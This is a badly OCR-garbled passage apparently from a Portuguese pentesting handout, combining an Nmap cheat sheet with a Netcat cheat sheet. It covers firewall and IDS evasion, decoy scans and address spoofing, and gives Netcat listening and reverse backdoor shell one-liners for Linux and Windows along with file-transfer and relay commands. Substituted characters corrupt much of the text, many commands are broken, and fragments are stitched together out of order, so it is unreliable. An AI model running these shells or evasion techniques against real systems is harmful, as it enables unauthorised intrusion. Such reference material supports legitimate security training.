Deference st*'esheet from Insec&re.6rg for more porta5'e 3( Preent associating --%o-st(lesheet: st*'esheet w/3( o&tp&t

of

)(

&ISC

-: Ena5'e IP scanning -!: Ena5'es 6) detection and Fersion detection --dtdi : )pecif* c&stom map data fi'e 'ocation

--se%d-eth&--se%d-ip: )end &sing raw ethernet frames or IP packets

FIRE'A((/IDS EVASION AND SPOOFING

--pi'ile4ed:

-f7 --)tu <'l>:

-5 : Print ersion n&m5er -h: Print this he'p s&mmar* page.

fragment packets =optiona''* w/gien 3+<

ss&me that the &ser is f&''* prii'eged

-8 : C'oak a scan with deco*s

-S : )poof so&rce address

-e : se specified interface

-4&--souce-pot : se gien port n&m5er

--dt-le%4th <%u)>:

E)A&P(ES )imp'e nmap -v nmap -v nmap -v nmap -v

-A scanme.nmap.org -sP 192.168.0.016 10.0.0.08 -i! 10000 -P0 -p 80 "s# scanme.nmap.org > file.t$t

ppend random data to sent packets --ttl <'l>: )et IP time$to$'ie fie'd

Pop&'ar / P&5'ished s*ntax

--spoof-)c <)c dd&pefix&'e%do %)e>:

%&AP -vv -A -s# -' -p- -P0 -o( target.$ml ))).$$$.***.+++

)poof *o&r 3C address

--dsu): )end packets with a 5og&s +CP/P checks&m

OUTPUT

-o -o -oS -o9 -o!

: 6&tp&t scan in norma' format : 6&tp&t scan in 3( format : 6&tp&t scan in s?rIpt kIddiA format : 6&tp&t scan in >repa5'e format <se%)e>: 6&tp&t in the three maBor formats at

nmap -vv -s# -P0 "p- -n --min,hostgroup 100 --ma$,retries  --ma$,rtt,timeout 120 --min,parallelism 100 -oA nmap -vv -p -s -A -P0 -n --min,hostgroup 100 --ma$,rtt,timeout 120 --min,parallelism 100 -oA -i live3Pist


Segundo ne8o

"pç*es do ,etCat F$n*a"%n#als &ndamenta' etcat C'ient: 4 nc 5arget3Par7 5port7 Connect to an ar5itrar* port GportH at IP ddress G+argetIPaddrH &ndamenta' etcat (istener: 4 nc "l -p 5ocalPort7 Create a etcat 'istener on ar5itrar* 'oca' port G(oca'PortH oth the c'ient and 'istener take inp&t from )+I and send data receied from the network to )+6+

F!l% T+ansf%+ P&sh a fi'e from c'ient to 'istener: 4 nc "l -p 5ocalPort7 > 5outfile7 (isten on G(oca'PortH, store res&'ts in Go&tfi'eH 4 nc ") 5arget3Par7 5port7 < 5infile7 P&sh Ginfi'eH to G+argetIPaddrH on GportH P&'' fi'e from 'istener 5ack to c'ient: 4 nc "l -p 5ocalPort7 < 5infile7 (isten on G(oca'PortH, prep to p&sh Ginfi'eH 4 nc ") 5arget3Par7 5port7 > 5outfile7 Connect to G+argetIPaddrH on GportH and retriee Go&tfi'eH TCP P+# Scann%+ Port scan an IP ddress: 4 nc "v "n "+ ")1 5arget3Par7 5start,port7-5en,port7 ttempt to connect to each port in a range from GendJportH to GstartJportH on IP ddress G+argetIPaddrH r&nning er5ose'* =$ on (in&x, $  on 8indows<, not reso'ing names =$n<, witho&t sending an* data =$;<, and waiting no more

Capítulo 21 ?e"af%o"@ !e"te" de In#a"ão - 269 than 1 second for a connection to occ&r =$w1< +he randomi;e ports =$r< switch can 5e &sed to choose port n&m5ers random'* in the range

TCP ,ann%+ G+a%+ >ra5 the 5anner of an* +CP serice r&nning on an IP ddress from (in&x: 4 echo   nc "v "n ")1 5arget3Par7 5start,port7-5en,port7 ttempt to connect to each port in a range from GendJportH to GstartJportH on IP ddress G+argetIPaddrH r&nning er5ose'* =$<, not reso'ing names =$n<, and waiting no more than 1 second for a connection to occ&r =$w1<. +hen send a 5'ank string to the open port and print o&t an* 5anner receied in response

,ac.*+ S%lls (istening 5ackdoor she'' on (in&x: 4 nc "l "p 5ocalPort7 "e /in/ash (istening 5ackdoor she'' on 8indows: :;> nc "l "p 5ocalPort7 "e cm.e$e Create a she'' on 'oca' port G(oca'PortH that can then 5e accessed &sing a f&ndamenta' etcat c'ient Deerse 5ackdoor she'' on (in&x: 4 nc 5our3Par7 5port7 "e /in/ash Deerse 5ackdoor she'' on 8indows: :;> nc 5our3Par7 5port7 "e cm.e$e Create a reerse she'' that wi'' attempt to connect to G-o&rIPaddrH on 'oca' port GportH. +his she'' can then 5e capt&red &sing a f&ndamenta' nc 'istener

N%#ca# R%la0s n (!n$1 +o start, create a I6 =named pipe< ca''ed 5ackpipe: 4 c tmp 4 mno /acpipe p (istener$to$C'ient De'a*: 4 nc "l "p 5ocalPort7 0
N%#ca# R%la0s n '!n*2s +o start, enter a temporar* director* where we wi'' create .5at fi'es: :;> c c:temp

Apostila - Pentest.pdf

Recommend Documents